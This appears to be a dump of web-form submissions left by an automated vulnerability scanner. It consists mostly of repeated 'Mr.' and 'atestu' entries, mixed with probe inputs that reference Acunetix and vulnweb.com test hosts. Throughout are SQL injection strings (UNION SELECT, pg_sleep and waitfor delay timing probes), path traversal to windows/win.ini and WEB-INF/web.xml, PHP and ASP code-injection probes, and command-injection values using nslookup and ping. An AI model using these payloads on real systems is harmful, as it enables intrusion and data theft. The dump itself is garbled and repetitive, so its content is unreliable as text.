-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
/www.vulnweb.com
-
Mr.
-
Mr.
-
/www.vulnweb.com
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
Mr.
-
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
testasp.vulnweb.com
-
Mr.
-
http://testasp.vulnweb.com/t/fit.txt?.
-
Mr.
-
Mr.
-
Mr.
-
Http://testasp.vulnweb.com/t/fit.txt
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
1some_inexistent_file_with_long_name
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp/.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp/.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
";print(md5(acunetix_wvs_security_test));$a="
-
Mr.
-
Mr.
-
Mr.
-
';print(md5(acunetix_wvs_security_test));$a='
-
${@print(md5(acunetix_wvs_security_test))}\
-
;print(md5(acunetix_wvs_security_test));
-
Mr.
-
Mr.
-
Mr.
-
";print(md5(acunetix_wvs_security_test));$a="
-
Mr.
-
';print(md5(acunetix_wvs_security_test));$a='
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
12345'"\'\");|]*
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
testasp.vulnweb.com
-
Mr.
-
1some_inexistent_file_with_long_name
-
Mr.
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/fit.txt?.
-
Mr.
-
Mr.
-
Mr.
-
Http://testasp.vulnweb.com/t/fit.txt
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://hitsr80D1dUls.bxss.me/
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://hit3UtSvnLgwj.bxss.me/
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
������������������������������������������������windows��win.ini
-
Mr.
-
Mr.
-
�''�""
-
�'�"
-
JyI=
-
@@KVftz
-
WEB-INF\web.xml
-
1
-
WEB-INF/web.xml
-
\
-
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
1'"
-
\
-
Mr.
-
1'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
1
-
WEB-INF/web.xml
-
Mr.
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
Mr.
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
Mr.
-
..\..\..\..\..\..\..\..\windows\win.ini
-
Mr.
-
................windowswin.ini
-
Mr.
-
WEB-INF\web.xml
-
C:\WINDOWS\system32\drivers\etc\hosts
-
Mr.
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
..\..\..\..\..\..\..\..\windows\win.ini
-
Mr.
-
................windowswin.ini
-
Mr.
-
������������������������������������������������windows��win.ini
-
Mr.
-
Mr.
-
Mr.
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
�''�""
-
Mr.
-
�'�"
-
Mr.
-
JyI=
-
@@zmxOa
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
atestu
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.9865056
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
LjBs3tS6'));select pg_sleep(5.046); --
-
-1' OR 2+664-664-1=0+0+0+1 --
-
Mr.
-
Mr.
-
-1 OR 2+490-490-1=0+0+0+1
-
Mr.
-
Mr.
-
-1 OR 2+853-853-1=0+0+0+1 --
-
Mr.
-
Mr.
-
Mr.
-
-1' OR 2+335-335-1=0+0+0+1 or 'E2uPcQVR'='
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
JIjsr8ri'); waitfor delay '0:0:14.092' --
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
C:\WINDOWS\system32\drivers\etc\hosts
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
24'
-
8X1JTMeN'));select pg_sleep(21.138); --
-
jteDrqZy');select pg_sleep(14.092); --
-
Mr.
-
kJTeeWdv')); waitfor delay '0:0:14.092' --
-
Mr.
-
Mr.
-
3h9Fxi4X'; waitfor delay '0:0:14.092' --
-
Mr.
-
1 waitfor delay '0:0:14.092' --
-
Mr.
-
Mr.
-
-1" OR 2+746-746-1=0+0+0+1 --
-
Mr.
-
Mr.
-
IHnvaAra';select pg_sleep(14.092); --
-
Mr.
-
898'
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'");>175http://=https://176 177 qessmb
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu^(#$!@#$)(()))******
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
zafkbv: zafkbv.htm
-
atestu
zafkbv: zafkbv
-
Mr.
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
Mr.
-
Mr.
-
response.write(9170617*9241632)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
&nslookup 3grwiawu&'\"`0&nslookup 3grwiawu&`'
-
Mr.
-
Mr.
-
Mr.
-
'+response.write(9170617*9241632)+'
-
$(nslookup Q5kvkhJU)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
set|set&set
-
Mr.
-
Mr.
-
"+response.write(9491512*9596429)+"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
&nslookup LRRhruQU&'\"`0&nslookup LRRhruQU&`'
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
$(nslookup lLkqdb6c)
-
Mr.
-
Mr.
-
Mr.
-
set|set&set
-
Mr.
-
"+response.write(9170617*9241632)+"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'+response.write(9491512*9596429)+'
-
Mr.
-
Mr.
-
Mr.
-
response.write(9491512*9596429)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
^(#$!@#$)(()))******
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
!(()&&!|*|*|
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
^(#$!@#$)(()))******
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
!(()&&!|*|*|
-
Mr.
-
Mr.
-
Mr.
-
)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
)
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'"()
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
'"()
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
http://testasp.vulnweb.com/t/xss.html?%00.jpg
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-
http://testasp.vulnweb.com/t/xss.html?%00.jpg
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
................windowswin.ini
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.9331312
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.9204011
-
Mr.
-
Mr.
-
Mr.
-
�''�""
-
�'�"
-
Mr.
-
JyI=
-
Mr.
-
@@3Fc5a
-
Mr.
-
1
-
Mr.
-
\
-
Mr.
-
1'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
�'�"
-
Mr.
-
JyI=
-
Mr.
-
@@qzaVR
-
Mr.
-
1
-
Mr.
-
\
-
Mr.
-
1'"
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
..\..\..\..\..\..\..\..\windows\win.ini
-
Mr.
-
................windowswin.ini
-
Mr.
-
������������������������������������������������windows��win.ini
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
Mr.
-
../../../../../../../../../../windows/win.ini
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
WEB-INF/web.xml
-
Mr.
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
Mr.
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
C:\WINDOWS\system32\drivers\etc\hosts
-
WEB-INF\web.xml
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
826'
-
8rMLQ9EV'));select pg_sleep(0); --
-
53x260Bw')); waitfor delay '0:0:0' --
-
-1" OR 2+619-619-1=0+0+0+1 --
-
-1' OR 2+991-991-1=0+0+0+1 --
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
-1 OR 2+510-510-1=0+0+0+1 --
-
Mr.
-
g3ga3y6W
-
WEB-INF/web.xml
-
Mr.
-
Mr.
-
-
Mr.
-
Mr.
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
Mr.
-
-1 OR 2+67-67-1=0+0+0+1
-
Mr.
-
Mr.
-
Mr.
-
";print(md5(acunetix_wvs_security_test));$a="
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
';print(md5(acunetix_wvs_security_test));$a='
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
;print(md5(acunetix_wvs_security_test));
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
/www.vulnweb.com
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
/www.vulnweb.com
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}\
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp/.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp/.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}\
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${@print(md5(acunetix_wvs_security_test))}
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
";print(md5(acunetix_wvs_security_test));$a="
-
Mr.
-
';print(md5(acunetix_wvs_security_test));$a='
-
Mr.
-
;print(md5(acunetix_wvs_security_test));
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
jlhd.asp
-
Mr.
-
Mr.
-
Mr.
-
'");>176http://=https://177 178 jiwbpd
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 11 127.0.0.1&
-
atestu
-
atestu
-
atestu;ping -c 21 127.0.0.1;
-
atestu
-
atestu
-
atestu;ping -c 11 127.0.0.1;
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
4294967297
-
-
-
-
-
-99999999
-
*/*'%00
-
"())[]]{}}'/@^*$;#,
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
'
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x5356427079667669,(SELECT (CASE WHEN (5126=5126) THEN 1 ELSE 0 END)),0x5356427079667669)-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu"+response.write(4083231*1628930)+"
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu)
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x66784f625576744b,(SELECT (CASE WHEN (5177=5177) THEN 1 ELSE 0 END)),0x66784f625576744b),NULL,NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x7a4e674d73465661,(SELECT (CASE WHEN (5178=5178) THEN 1 ELSE 0 END)),0x7a4e674d73465661),NULL,NULL,NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT CONCAT(0x6935615a59393664,(SELECT (CASE WHEN (5785=5785) THEN 1 ELSE 0 END)),0x6935615a59393664),NULL,NULL,NULL,NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu'
-
atestu
-
atestu
-
atestu
-
atestu"
-
atestu
-
atestu
-
atestu
-
atestu"NotExist
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
${14836293+86300369}
-
atestu
-
atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x4375374470644d58,(SELECT (CASE WHEN (5901=5901) THEN 1 ELSE 0 END)),0x4375374470644d58)-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x4230476334573346,(SELECT (CASE WHEN (5424=5424) THEN 1 ELSE 0 END)),0x4230476334573346),NULL-- end
-
atestu' AnD 1173=1173 Or '1173'='1173' --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu LIMIT 0,1 UNION ALL SELECT CONCAT(0x78334f3552627939,(SELECT (CASE WHEN (5308=5308) THEN 1 ELSE 0 END)),0x78334f3552627939),NULL,NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu" AnD 1455=1455 Or "1455"="1455" --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu" AnD 1455=1455 Or "1455"="1456" --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x5377524a6d363144,(SELECT (CASE WHEN (5020=5020) THEN 1 ELSE 0 END)),0x5377524a6d363144)-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x69626b3647483341,(SELECT (CASE WHEN (5785=5785) THEN 1 ELSE 0 END)),0x69626b3647483341),NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x336d643235735966,(SELECT (CASE WHEN (5931=5931) THEN 1 ELSE 0 END)),0x336d643235735966)-- end
-
atestu
-
atestu
-
atestu
-
